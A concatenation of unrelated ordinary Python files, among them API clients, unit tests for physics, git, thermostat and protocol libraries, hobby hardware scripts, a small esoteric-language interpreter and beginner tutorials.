from osbrain import run_agent
from osbrain import run_nameserver
if __name__ == '__main__':
ns = run_nameserver()
alice = run_agent('Alice')
bob = run_agent('Bob')
addr = alice.bind('REP', handler=lambda agent, msg: 'Received ' + str(msg))
bob.connect(addr, alias='main')
for i in range(10):
bob.send('main', i)
reply = bob.recv('main')
print(reply)
ns.shutdown()
|
import time
#Writes to file
def writeFile(path, text):
file = open(path, "w")
file.write(text)
file.close()
#Appends to file
def appendFile(path, text):
file = open(path, "a")
file.write(text)
file.close()
#Prints with no new lines
def printn(text):
print(text, end="")
#Prints letter by letter
def lbl(text, speed=0.1):
for x in range(0,len(text)):
print(text[x], end="")
time.sleep(speed)
print()
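# A small usage sketch of the helpers above (the file name "demo.txt" is
# just an illustrative value for this sketch):
if __name__ == "__main__":
    writeFile("demo.txt", "hello\n")
    appendFile("demo.txt", "world\n")
    printn("printed without a newline... ")
    lbl("typed out letter by letter", speed=0.01)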
|
#!/usr/bin/env python3
################################################################
# Example of using AlphaVantage API
# Sign up to get an API key and load it from a .env file (read via load_dotenv below)
# This script currently just gets the 5 latest daily values for Bitcoin, but it can fetch other symbols as well
# It will eventually replace my PowerShell script at https://automationadmin.com/2020/09/ps-send-email-bitcoin
################################################################
import requests
from requests.auth import HTTPBasicAuth
import sys
from dotenv import load_dotenv
import os
import json
load_dotenv()
try:
    api_key = os.environ["API_KEY"]
except KeyError:
    print("Unable to get environmental variables")
    sys.exit(1)
except Exception as e:
    print("Generic catch: Unable to get environmental variables")
    print("Generic catch: " + str(e))
    sys.exit(1)
# funds = ["VFIFX", "VWUSX", "VTSAX", "BTCUSD"]
# for fund in funds:
# url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY_ADJUSTED&symbol={fund}&apikey={api_key}"
# payload = {}
# headers = {
# 'Content-Type': 'application/json',
# }
# r = requests.request("GET", url, headers=headers, data=payload)
# print(r.text)
url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY_ADJUSTED&symbol=BTCUSD&apikey={api_key}"
payload = {}
headers = {
'Content-Type': 'application/json',
}
r = requests.request("GET", url, headers=headers, data=payload)
req = r.json()
## print whole req
# print(req)
# print(dir(req))
## dump to file system
# filename = 'req.json'
# with open(filename, 'w') as f:
# json.dump(req, f)
## get all the keys and values
#print(req['Time Series (Daily)'])
## get just the keys
#print(req['Time Series (Daily)'].keys())
## sort them
keylist = list(req['Time Series (Daily)'].keys())
keylist.sort(reverse=True)
## give me just the top 5
print(keylist[0:5])
## print their values to make sure we got them
first_five_list = keylist[0:5]
for first_five in first_five_list:
print(req['Time Series (Daily)'][first_five])
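# A hedged follow-on sketch: pull a single field per day from the same payload.
# The key name "4. close" is an assumption about the AlphaVantage daily series
# field labels, so .get() is used to avoid a KeyError if it differs.
for day in first_five_list:
    print(day, req['Time Series (Daily)'][day].get('4. close'))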
|
from typing import NamedTuple
from string import ascii_letters
class UnknownLocaleError(Exception):
pass
class Locale(NamedTuple):
language: str
territory: str = ''
def __str__(self):
if self.territory:
return f'{self.language}_{self.territory}'
return self.language
@classmethod
def parse(cls, identifier, sep):
if not isinstance(identifier, str):
raise TypeError(f"Unexpected value for identifier: '{identifier}'")
locale = cls(*identifier.split(sep, 1))
if not all(x in ascii_letters for x in locale.language):
raise ValueError(f"expected only letters, got '{locale.language}'")
if len(locale.language) != 2:
raise UnknownLocaleError(f"unknown locale '{locale.language}'")
return locale
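# Minimal usage sketch of the parser above (identifiers are illustrative):
if __name__ == '__main__':
    print(Locale.parse('en_US', sep='_'))  # -> en_US
    print(Locale.parse('de', sep='_'))     # -> de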
|
from __future__ import division
import hoomd
import hoomd.md
import unittest
hoomd.context.initialize();
# test the md.constrain.rigid() functionality
class test_log_energy_upon_run_command(unittest.TestCase):
def test_log(self):
uc = hoomd.lattice.unitcell(N = 1,
a1 = [10.8, 0, 0],
a2 = [0, 1.2, 0],
a3 = [0, 0, 1.2],
dimensions = 3,
position = [[0,0,0]],
type_name = ['R'],
mass = [1.0],
moment_inertia = [[0,
1/12*1.0*8**2,
1/12*1.0*8**2]],
orientation = [[1, 0, 0, 0]]);
system = hoomd.init.create_lattice(unitcell=uc, n=[8,18,18]);
system.particles.types.add('A')
rigid = hoomd.md.constrain.rigid()
rigid.set_param('R',
types=['A']*8,
positions=[(-4,0,0),(-3,0,0),(-2,0,0),(-1,0,0),
(1,0,0),(2,0,0),(3,0,0),(4,0,0)]);
rigid.create_bodies()
nl = hoomd.md.nlist.cell()
lj = hoomd.md.pair.lj(r_cut=3.0, nlist=nl)
lj.set_params(mode='shift')
lj.pair_coeff.set(['R', 'A'], ['R', 'A'], epsilon=1.0, sigma=1.0)
hoomd.md.integrate.mode_standard(dt=0.001);
rigid_gr = hoomd.group.rigid_center();
integrator=hoomd.md.integrate.langevin(group=rigid_gr, kT=1.0, seed=42);
log = hoomd.analyze.log(filename=None,
quantities=['potential_energy',
'translational_kinetic_energy',
'rotational_kinetic_energy', 'pressure'],
period=1,
overwrite=True);
hoomd.run(100);
self.last_l = None
def cb(timestep):
l = log.query('potential_energy')
if self.last_l is not None:
rel_dl = abs(l)/abs(self.last_l)
else:
rel_dl = 1.0
# the log value shouldn't change abruptly
self.assertTrue(rel_dl > 0.5)
self.assertTrue(rel_dl < 1.5)
self.last_l = l
for i in range(10):
hoomd.run(10,callback=cb, callback_period=1)
if __name__ == '__main__':
unittest.main(argv = ['test.py', '-v'])
|
# Copyright (C) 2010, 2011 Sebastian Thiel (byronimo@gmail.com) and contributors
#
# This module is part of GitDB and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
"""Performance tests for object store"""
from git.test.performance.lib import (
TestBigRepoR,
GlobalsItemDeletorMetaCls
)
from git.exc import UnsupportedOperation
import sys
import os
from time import time
import random
class PerfBaseDeletorMetaClass(GlobalsItemDeletorMetaCls):
ModuleToDelete = 'TestPurePackedODBPerformanceBase'
class TestPurePackedODBPerformanceBase(TestBigRepoR):
__metaclass__ = PerfBaseDeletorMetaClass
#{ Configuration
PackedODBCls = None
#} END configuration
@classmethod
def setUpAll(cls):
super(TestPurePackedODBPerformanceBase, cls).setUpAll()
if cls.PackedODBCls is None:
raise AssertionError("PackedODBCls must be set in subclass")
#END assert configuration
cls.ropdb = cls.PackedODBCls(cls.rorepo.db_path("pack"))
def test_pack_random_access(self):
pdb = self.ropdb
# sha lookup
st = time()
sha_list = list(pdb.sha_iter())
elapsed = time() - st
ns = len(sha_list)
print >> sys.stderr, "PDB: looked up %i shas by index in %f s ( %f shas/s )" % (ns, elapsed, ns / elapsed)
# sha lookup: best-case and worst case access
pdb_pack_info = pdb._pack_info
# END shuffle shas
st = time()
for sha in sha_list:
pdb_pack_info(sha)
# END for each sha to look up
elapsed = time() - st
# discard cache
del(pdb._entities)
pdb.entities()
print >> sys.stderr, "PDB: looked up %i sha in %i packs in %f s ( %f shas/s )" % (ns, len(pdb.entities()), elapsed, ns / elapsed)
# END for each random mode
# query info and streams only
max_items = 10000 # can wait longer when testing memory
for pdb_fun in (pdb.info, pdb.stream):
st = time()
for sha in sha_list[:max_items]:
pdb_fun(sha)
elapsed = time() - st
print >> sys.stderr, "PDB: Obtained %i object %s by sha in %f s ( %f items/s )" % (max_items, pdb_fun.__name__.upper(), elapsed, max_items / elapsed)
# END for each function
# retrieve stream and read all
max_items = 5000
pdb_stream = pdb.stream
total_size = 0
st = time()
for sha in sha_list[:max_items]:
stream = pdb_stream(sha)
stream.read()
total_size += stream.size
elapsed = time() - st
total_kib = total_size / 1000
print >> sys.stderr, "PDB: Obtained %i streams by sha and read all bytes totallying %i KiB ( %f KiB / s ) in %f s ( %f streams/s )" % (max_items, total_kib, total_kib/elapsed , elapsed, max_items / elapsed)
def test_correctness(self):
pdb = self.ropdb
# disabled for now as it used to work perfectly, checking big repositories takes a long time
print >> sys.stderr, "Endurance run: verify streaming of objects (crc and sha)"
for crc in range(2):
count = 0
st = time()
for entity in pdb.entities():
pack_verify = entity.is_valid_stream
sha_by_index = entity.index().sha
for index in xrange(entity.index().size()):
try:
assert pack_verify(sha_by_index(index), use_crc=crc)
count += 1
except UnsupportedOperation:
pass
# END ignore old indices
# END for each index
# END for each entity
elapsed = time() - st
print >> sys.stderr, "PDB: verified %i objects (crc=%i) in %f s ( %f objects/s )" % (count, crc, elapsed, count / elapsed)
# END for each verify mode
|
import sys
import json
from detect import Darknetv5Detector, Darknetv3Detector
from train import DarknetTrainer
def configure_json(json_path):
    """Load a JSON file after stripping tabs, newlines and trailing commas
    (e.g. '{"a": 1,}') so slightly sloppy config files still parse."""
with open(json_path, 'r') as f:
s = f.read()
s = s.replace('\t', '')
s = s.replace('\n', '')
s = s.replace(',}', '}')
s = s.replace(',]', ']')
return json.loads(s)
def fetch_parameters():
params = configure_json("params.json")
detector_params = {
"images": params["detector_params"]["images_path"],
"destination": params["detector_params"]["destination_path"],
"yolo_version": params["detector_params"]["yolo_version"],
"yolov5_size": params["detector_params"]["yolov5_size"],
"cfg_path": params["detector_params"]["cfg_file_path"],
"weights_path": params["detector_params"]["weights_file_path"],
"resolution": params["detector_params"]["resolution"],
"confidence": params["detector_params"]["confidence"],
"nms_thresh": params["detector_params"]["nms_threshold"],
"CUDA": params["detector_params"]["CUDA"],
"TORCH": params["detector_params"]["use_torch_weights"],
}
trainer_params = {
"cfg_file": params["detector_params"]["cfg_file_path"],
"weights_file": params["detector_params"]["weights_file_path"],
"epoch": params["training_params"]["number_of_epoch"],
"batch_size": params["training_params"]["batch_size"],
"resolution": params["detector_params"]["resolution"],
"confidence": params["detector_params"]["confidence"],
"CUDA": params["detector_params"]["CUDA"],
"TUNE": params["training_params"]["start_from_checkpoint"],
}
validator_params = {
"annotation_dir": params["training_params"]["valid_annot_dir"],
"img_dir": params["training_params"]["valid_img_dir"],
}
train_params = {
"annotation_dir": params["training_params"]["train_annot_dir"],
"img_dir": params["training_params"]["train_img_dir"],
}
return detector_params, trainer_params, validator_params, train_params
def main():
if sys.argv[1] == "detect":
detector_params, _, _, _ = fetch_parameters()
if detector_params["yolo_version"] == 5:
detector = Darknetv5Detector(detector_params["images"],
detector_params["yolov5_size"],
detector_params["destination"])
elif detector_params["yolo_version"] == 3:
detector_params.pop("yolo_version")
detector_params.pop("yolov5_size")
detector = Darknetv3Detector(**detector_params)
else:
raise Exception("Unknown YOLO version !!")
detector()
elif sys.argv[1] == "train":
_, trainer_params, valid_params, train_params = fetch_parameters()
trainer = DarknetTrainer(**trainer_params)
trainer.get_validator(**valid_params)
trainer.train(**train_params)
else:
raise Exception("Unknown Command Error !!")
if __name__ == "__main__":
main()
|
import logging
from django.core.management import call_command
from django.utils import timezone
from model_bakery import baker
from fritzbox_thermostat_triggers.triggers.models import Thermostat
logger = logging.getLogger(__name__)
class MockedFritzbox:
def login(*args, **kwargs):
pass
def set_target_temperature(*args, **kwargs):
pass
def get_devices(*args, **kwargs):
pass
class MockedDevice:
def __init__(self, ain, name, target_temperature):
self.ain = ain
self.name = name
self.target_temperature = target_temperature
self.has_thermostat = True
def mocked_send_push_notification(message, title=None):
logger.debug(title)
logger.debug(message)
def test_command_sync_and_trigger_thermostats(db, monkeypatch):
# Setup
device_livingroom = MockedDevice("11962 0785015", "Living Room", 21)
device_kitchen = MockedDevice("11962 0785016", "Kitchen", 21)
thermostat_livingroom = baker.make(
"triggers.Thermostat", ain=device_livingroom.ain, name="Other name"
)
assert Thermostat.objects.count() == 1
assert thermostat_livingroom.name != device_livingroom.name
def mocked_get_fritzbox_connection():
return MockedFritzbox()
def mocked_get_fritzbox_thermostat_devices():
return [
device_livingroom,
device_kitchen,
]
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.send_push_notification"
),
mocked_send_push_notification,
)
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.get_fritzbox_connection"
),
mocked_get_fritzbox_connection,
)
monkeypatch.setattr(
(
"fritzbox_thermostat_triggers.triggers.management.commands."
"sync_and_trigger_thermostats.get_fritzbox_thermostat_devices"
),
mocked_get_fritzbox_thermostat_devices,
)
# Test
call_command("sync_and_trigger_thermostats")
# We did not specify Triggers and already have a Thermostat fetched,
# so the script will have skipped additional syncing.
assert Thermostat.objects.count() == 1
# Creating an active Trigger will help with that.
trigger = baker.make(
"triggers.Trigger",
thermostat=thermostat_livingroom,
name="my trigger",
temperature=0.0,
time=timezone.now(),
)
assert trigger.logs.count() == 0
# Ensure running the command multiple times in a short timespan
# does not actually do anything on top.
call_command("sync_and_trigger_thermostats")
call_command("sync_and_trigger_thermostats")
call_command("sync_and_trigger_thermostats")
# A new Device has been created by the sync, the existing one has
# its name corrected.
assert Thermostat.objects.count() == 2
thermostat_livingroom.refresh_from_db()
assert thermostat_livingroom.name == device_livingroom.name
thermostat_kitchen = Thermostat.objects.last()
assert thermostat_kitchen.ain == device_kitchen.ain
assert thermostat_kitchen.name == device_kitchen.name
# The Trigger has also been executed, logged and deactivated.
trigger.refresh_from_db()
assert not trigger.enabled
assert trigger.logs.count() == 1
log = trigger.logs.last()
assert log.triggered_at is not None
assert log.trigger == trigger
assert not log.no_op
# Running the sync against the same Trigger again won't do anything.
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert not trigger.enabled
assert trigger.logs.count() == 1
# This still holds true for a recurring Trigger.
trigger.recur_on_monday = True
trigger.recur_on_tuesday = True
trigger.recur_on_wednesday = True
trigger.recur_on_thursday = True
trigger.recur_on_friday = True
trigger.recur_on_saturday = True
trigger.recur_on_sunday = True
trigger.enabled = True
trigger.save()
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert trigger.enabled
assert trigger.logs.count() == 1
# If we remove the logs we can trigger it again though.
trigger.logs.all().delete()
assert trigger.logs.count() == 0
call_command("sync_and_trigger_thermostats")
trigger.refresh_from_db()
assert trigger.enabled
assert trigger.logs.count() == 1
|
# -*- coding: utf-8 -*-
from math import cos, sin
import time
from unicorn.utils import bracket
from base import EffectBase
class Rainbow(EffectBase):
"""
Largely borrowed from the Pimoroni examples.
"""
i = 0.0
offset = 30
def __init__(self, *args, **kwargs):
super(Rainbow, self).__init__(*args, **kwargs)
def run(self, stop):
while True:
self.i = self.i + 0.3
for y in range(self.height):
for x in range(self.width):
r = (cos((x + self.i) / 2.0) + cos((y + self.i) / 2.0)) * 64.0 + 128.0
g = (sin((x + self.i) / 1.5) + sin((y + self.i) / 2.0)) * 64.0 + 128.0
b = (sin((x + self.i) / 2.0) + cos((y + self.i) / 1.5)) * 64.0 + 128.0
r = int(bracket(r + self.offset))
g = int(bracket(g + self.offset))
b = int(bracket(b + self.offset))
self.uh.set_pixel(x, y, r, g, b)
if stop():
return
self.uh.show()
time.sleep(0.02)
|
import collections
import secrets
import statistics
import click
from gitkit.util.shell import get_output
def print_stats(title, lst):
print(title, "common", collections.Counter(lst).most_common(10))
print(title, "median", statistics.median(lst))
print(title, "mean ", statistics.mean(lst))
print(title, "minmax", min(lst), max(lst))
def get_git_message_lengths():
    # Append a random sentinel token to each commit body (%B) so the log
    # output can be split back into individual messages even when the
    # bodies themselves contain blank lines.
    marker = secrets.token_urlsafe(16)
    messages = get_output(f"git log '--pretty=%B{marker}'").split(marker)
first_line_lengths = []
rest_line_lengths = []
message_line_counts = []
message_lengths = []
for message in messages:
lines = [
line for line in (line.strip() for line in message.splitlines()) if line
]
if not lines:
continue
message_lengths.append(sum(len(line) for line in lines))
message_line_counts.append(len(lines))
first_line_lengths.append(len(lines.pop(0)))
for line in lines:
rest_line_lengths.append(len(line))
return (first_line_lengths, rest_line_lengths, message_line_counts, message_lengths)
@click.command()
def message_stats():
"""
Print out some statistics about the commit messages in the repo.
"""
(
first_line_lengths,
rest_line_lengths,
message_line_counts,
message_lengths,
) = get_git_message_lengths()
print_stats("first line", first_line_lengths)
print_stats("rest lines", rest_line_lengths)
print_stats("line count", message_line_counts)
print_stats("msg length", message_lengths)
|
import buildhat
import time
dist_sensor = buildhat.DistanceSensor('B')
motor = buildhat.Motor('A')
dist_sensor.eyes(0,0,50,50) # (Lup, Rup, Ldown, Rdown)
while True:
dist = dist_sensor.get()[0]
if dist > 0:
if dist < 50:
motor.run_for_degrees(30)
elif dist < 80:
print( motor.get_position())
time.sleep(1)
|
"""
tungsten
~~~~~~~~
Main module
"""
from .core import *
__title__ = 'tungsten'
__version__ = '0.1.1'
__author__ = 'Seena Burns'
__license__ = 'BSD'
__copyright__ = 'Copyright 2012 Seena Burns'
|
# Dictionary: a mapping data structure
# Provides a way to handle data by linking each key to a value
# A key is a number or name used to identify the stored data
# A value is the data stored under its key
# So if you know the key, you can look up the data directly
# A dictionary is written as {} with key:value pairs
# Multiple key:value pairs are separated by commas
menu = { '1': 'newSungJuk', '2': 'showSungJuk',
         '3': 'modifySungJuk' }  # keys can be of various types
book = {
    'bookid': '1',
    'bookname': 'History of Soccer',
    'publisher': 'Good Sports',
    'price': '7000'
}
order = {
    'orderid': '1',
    'custid': '1',
    'bookid': '1',
    'saleprice': 6000,
    'orderdate': '2014-07-01'
}
customer = {
    'custid': '1',
    'name': 'Park Ji-sung',
    'address': 'Manchester, England',
    'phone': '000-5000-0001'
}
print(book)
books_list = []
books_list.append( book ) # store the created dictionary in a list
books_list.append( book )
books_list.append( book )
print( books_list )
# Dictionary methods
print( '1' in book ) # the in operator searches keys
print('bookid' in book)
print( book[ 'bookid' ] ) # look up a value by key
print( book[ 'bookname' ] )
print( book[ 'price' ] )
# print( book[ 'orderid' ] ) # looking up a missing key raises an error!
print( book.get( 'bookname' ) )
print( book.get( 'orderid' ) ) # get() returns None for a missing key
bkname = book[ 'bookname' ] # print the value looked up by key
print( bkname )
print( book.get( 'bookid' ) )
book[ 'bookid' ] = 99 # modify a value by key
print( book.get( 'bookid' ) )
print( book )
book.update( { 'format': '3 x 4' } ) # add a new key: value pair
print( book )
print( book )
book.update( { 'format': '6 x 10' } ) # modify the value of an existing key
print( book )
del book[ 'format' ] # delete an existing key
print( book )
# book.clear() # delete every key
print( book.keys() ) # print all keys
print( book.values() ) # print all values
print( book.items() ) # print all key:value pairs as tuples
items = book.items() # all key:value pairs as a list of tuples
print( list( items ) )
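# Follow-on example: iterate over the key:value pairs returned by items()
for key, value in book.items():
    print(key, ':', value)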
|
import math
import sys
def print_bytes(a):
bl=a.bit_length()//8
residue=a.bit_length()%8
if (residue!=0):
bl+=1
print(a.to_bytes(bl,"big"))
MODE_BINARY=0
MODE_8_BIT_ASCII=1
input_buffer=0
input_string=""
input_count=0
output_buffer=0
output_count=0
def my_output(bit, mode):
global output_buffer,output_count
if mode==MODE_BINARY:
print(end=str(bit))
elif mode==MODE_8_BIT_ASCII:
output_buffer<<=1
output_buffer+=bit
output_count+=1
if (output_count>=8):
print(end=chr(output_buffer))
output_count=0
output_buffer=0
def my_input(mode):
global input_buffer,input_string,input_count
if mode==MODE_BINARY:
while True:
bit_in=input()
if (not (bit_in=="0" or bit_in=="1")):
print("Input must be 0 or 1")
else:
return int(bit_in)
elif mode==MODE_8_BIT_ASCII:
if(input_count==0 or input_count>=8):
if (input_string==""):
input_string=input()
if (input_string==""):
input_buffer=0
input_string=""
input_count=0
else:
input_buffer=ord(input_string[0])
input_string=input_string[1:]
input_count=0
bit_in=input_buffer&128
input_count+=1
input_buffer<<=1
input_buffer%=256
return bit_in//128
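# Format notes (derived from interpret() below): the program is treated as a
# bit string split into fixed-width lines of A(1) B(x) C(x) D(1) E(1) bits,
# where x = (line_num - 1).bit_length(). If D == 1 the bit E is output.
# If A == 1 an input bit is read and execution jumps to line B (input 0) or
# line C (input 1); if A == 0 it jumps to line B, halting when C is all ones.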
def interpret(src_file, mode=MODE_BINARY):
src_file.seek(0,2)
size=src_file.tell()*8
line_length=3
line_num=1
while(True):
line_length=(line_num-1).bit_length()*2+3
if(size>line_length*line_num>=size-8):
break
line_num+=1
src_file.seek(0,0)
raw_bytes=src_file.read(-1)
entire_bitcode_in_int=int.from_bytes(raw_bytes,"big")
shift_1_bit=entire_bitcode_in_int.bit_length()-1
shift_x_bit=entire_bitcode_in_int.bit_length()-(line_num-1).bit_length()
mask_1_bit=1
mask_x_bit=(1<<(line_num-1).bit_length())-1
while(True):
A=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
B=(entire_bitcode_in_int>>shift_x_bit)&mask_x_bit
shift_1_bit-=(line_num-1).bit_length()
shift_x_bit-=(line_num-1).bit_length()
C=(entire_bitcode_in_int>>shift_x_bit)&mask_x_bit
shift_1_bit-=(line_num-1).bit_length()
shift_x_bit-=(line_num-1).bit_length()
D=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
E=(entire_bitcode_in_int>>shift_1_bit)&mask_1_bit
shift_1_bit-=1
shift_x_bit-=1
if (int(D)==1):
my_output(E,mode)
if(A==1):
bit_in=None
while(not (bit_in==0 or bit_in==1)):
bit_in=my_input(mode)
if(bit_in==0):
IP=B
else:
IP=C
else: #A==0
if (C==mask_x_bit):
break
IP=B
shift_1_bit=entire_bitcode_in_int.bit_length()-1-IP*line_length
shift_x_bit=entire_bitcode_in_int.bit_length()-(line_num-1).bit_length()-IP*line_length
print()
if __name__ == "__main__":
mode=MODE_BINARY
if (sys.argv[1]=="-a"):
src_file=open(sys.argv[2],"rb")
mode=MODE_8_BIT_ASCII
else:
src_file=open(sys.argv[1],"rb")
interpret(src_file,mode)
|
# -*-coding:utf-8-*-
__author__ = 'Tracy'
import json
import xlrd
with xlrd.open_workbook('numbers.xls') as f:
    table = f.sheet_by_index(0)
    rows = table.nrows
    cols = table.ncols
    lists = []
    for row in range(rows):
        row_values = []
        for x in table.row_values(row):
            row_values.append(x)
        lists.append(row_values)
s = json.dumps(lists, ensure_ascii=False, indent=4)
content = '<?xml version="1.0" encoding="UTF-8"?>\n<root>\n<numbers>\n<!--\n Number information\n-->\n'
content = content + s + '\n</numbers>\n</root>'
with open('numbers.xml', 'w') as f:
    f.write(content)
|
import unittest
from cdm.enums import CdmDataFormat
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmTypeAttributeDefinition
from cdm.utilities import TraitToPropertyMap
class TraitToPropertyMapTests(unittest.TestCase):
def test_trait_to_unknown_data_format(self):
"""Test trait to data format when unknown data format trait is in an attribute."""
cdm_attribute = CdmTypeAttributeDefinition(CdmCorpusContext(CdmCorpusDefinition(), None), 'SomeAttribute')
cdm_attribute.applied_traits.append('is.data_format.someRandomDataFormat')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
data_format = trait_to_property_map._traits_to_data_format(False)
self.assertEqual(CdmDataFormat.UNKNOWN, data_format)
def test_trait_to_json_data_format(self):
"""Test trait to data format when calculated data format should be JSON."""
cdm_attribute = CdmTypeAttributeDefinition(CdmCorpusContext(CdmCorpusDefinition(), None), 'SomeAttribute')
cdm_attribute.applied_traits.append('is.dataFormat.array')
cdm_attribute.applied_traits.append('means.content.text.JSON')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
data_format = trait_to_property_map._traits_to_data_format(False)
self.assertEqual(CdmDataFormat.JSON, data_format)
def test_update_and_fetch_list_lookup(self):
"""Test update and fetch list lookup default value without attributeValue and displayOrder."""
corpus = CdmCorpusDefinition()
cdm_attribute = CdmTypeAttributeDefinition(corpus.ctx, 'SomeAttribute')
trait_to_property_map = TraitToPropertyMap(cdm_attribute)
constant_values = [
{
'languageTag': 'en',
'displayText': 'Fax'
}
]
trait_to_property_map.update_property_value('defaultValue', constant_values)
result = trait_to_property_map.fetch_property_value('defaultValue')
self.assertEqual(1, len(result))
self.assertEqual('en', result[0].get('languageTag'))
self.assertEqual('Fax', result[0].get('displayText'))
self.assertIsNone(result[0].get('attributeValue'))
self.assertIsNone(result[0].get('displayOrder'))
|
def get_min_max(ints):
"""
Return a tuple(min, max) out of list of unsorted integers.
Args:
ints(list): list of integers containing one or more integers
"""
if ints == []:
return None
minimum = float('inf')
maximum = float('-inf')
for i in ints:
if i < minimum:
minimum = i
if i > maximum:
maximum = i
return (minimum, maximum)
## Example Test Case of Ten Integers
import random
l = [i for i in range(0, 10)] # a list containing 0 - 9
random.shuffle(l)
print ("Pass" if ((0, 9) == get_min_max(l)) else "Fail")
#own test_cases
print("Test Case 1 - Empty Array -> Return None")
input = []
solution = None
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 1 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 2 - length == 1")
input = [1]
solution = (1, 1)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 2 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 3 - contains negative values")
input = [-1, -5, -10, -22]
solution = (-22, -1)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 3 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 4 - positive and negative values")
input = [-1, -2, 5, -11, 123, -55]
solution = (-55, 123)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 4 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
print("Test Case 5 - one negative number")
input = [-5238559573295]
solution = (-5238559573295, -5238559573295)
output = get_min_max(input)
print("Output: {0}".format(output))
assert(output == solution)
print("TestCase 5 passed! - Given output {0}; Expected output {1}".format(output, solution))
print("---------------------------")
|
import unittest
from ..pcp import pcpmessage
#===============================================================================
class TestPcpMessage(unittest.TestCase):
def setUp(self):
self.pcp_client_ip = "192.168.1.1"
self.pcp_fields_request_map_common = {
'version': 2,
'message_type': pcpmessage.PcpMessageTypes.REQUEST,
'opcode': pcpmessage.PcpMessageOpcodes.MAP,
'lifetime': 300,
'pcp_client_ip': self.pcp_client_ip
}
self.pcp_fields_request_peer_common = dict(self.pcp_fields_request_map_common)
self.pcp_fields_request_peer_common['opcode'] = pcpmessage.PcpMessageOpcodes.PEER
self.pcp_fields_request_announce_common = dict(self.pcp_fields_request_map_common)
self.pcp_fields_request_announce_common['opcode'] = pcpmessage.PcpMessageOpcodes.ANNOUNCE
self.pcp_fields_response_map_common = {
'version': 2,
'message_type': pcpmessage.PcpMessageTypes.RESPONSE,
'opcode': pcpmessage.PcpMessageOpcodes.MAP,
'result_code': 1,
'lifetime': 300,
'epoch_time': 123461316
}
self.pcp_fields_map = {
'mapping_nonce': "0102030464ff8e110a090204",
'protocol': 0x11,
'internal_port': 1250,
'external_port': 5555,
'external_ip': "200.0.0.1"
}
self.pcp_fields_peer = {
'mapping_nonce': "0102030464ff8e110a090204",
'protocol': 0x11,
'internal_port': 1250,
'external_port': 5555,
'external_ip': "200.0.0.1",
'remote_peer_port': 4444,
'remote_peer_ip': "210.0.0.100"
}
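        # Byte layout of the common request header encoded below: version (1
        # byte, 2) | R-bit + opcode (1 byte, request MAP) | reserved (2 bytes)
        # | lifetime (4 bytes, 300 = 0x0000012C) | PCP client IP as an
        # IPv4-mapped IPv6 address (16 bytes, ::ffff:192.168.1.1).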
self.pcp_data_request_map_common = (
'\x02\x01\x00\x00'
'\x00\x00\x01,'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc0\xa8\x01\x01'
)
data_list = list(self.pcp_data_request_map_common)
message_type = ord(data_list[1]) >> 7
data_list[1] = chr(message_type | pcpmessage.PcpMessageOpcodes.PEER)
self.pcp_data_request_peer_common = ''.join(data_list)
data_list = list(self.pcp_data_request_map_common)
message_type = ord(data_list[1]) >> 7
data_list[1] = chr(message_type | pcpmessage.PcpMessageOpcodes.ANNOUNCE)
self.pcp_data_request_announce_common = ''.join(data_list)
self.pcp_data_map = (
'\x01\x02\x03\x04d\xff\x8e\x11\n\t\x02\x04'
'\x11\x00\x00\x00'
'\x04\xe2\x15\xb3'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc8\x00\x00\x01'
)
self.pcp_data_peer = (
'\x01\x02\x03\x04d\xff\x8e\x11\n\t\x02\x04'
'\x11\x00\x00\x00'
'\x04\xe2\x15\xb3'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xc8\x00\x00\x01'
'\x11\\\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xd2\x00\x00d'
)
self.pcp_data_response_map_common = (
'\x02\x81\x00\x01'
'\x00\x00\x01,'
'\x07[\xde\xc4'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
def _test_parse_pcp_opcode(self, data, fields):
pcp_message = pcpmessage.PcpMessage.parse(data, self.pcp_client_ip)
for field_name in fields.keys():
self.assertEqual(
pcp_message[field_name], fields[field_name],
msg="{0}: {1} != {2}".format(field_name, pcp_message[field_name], fields[field_name]))
def test_parse_pcp_request_map(self):
fields = self.pcp_fields_request_map_common
fields.update(self.pcp_fields_map)
self._test_parse_pcp_opcode(
self.pcp_data_request_map_common + self.pcp_data_map, fields)
def test_parse_pcp_request_peer(self):
fields = self.pcp_fields_request_peer_common
fields.update(self.pcp_fields_peer)
self._test_parse_pcp_opcode(
self.pcp_data_request_peer_common + self.pcp_data_peer, fields)
def test_parse_pcp_request_announce(self):
self._test_parse_pcp_opcode(
self.pcp_data_request_announce_common, self.pcp_fields_request_announce_common)
def test_parse_pcp_message_data_length_less_than_minimum(self):
pcp_message = pcpmessage.PcpMessage.parse('\x00', self.pcp_client_ip)
self.assertEqual(pcp_message, None)
def test_parse_pcp_message_supported_version_data_length_less_than_minimum(self):
pcp_message = pcpmessage.PcpMessage.parse(
self.pcp_data_request_map_common[:10], self.pcp_client_ip)
self.assertEqual(pcp_message, None)
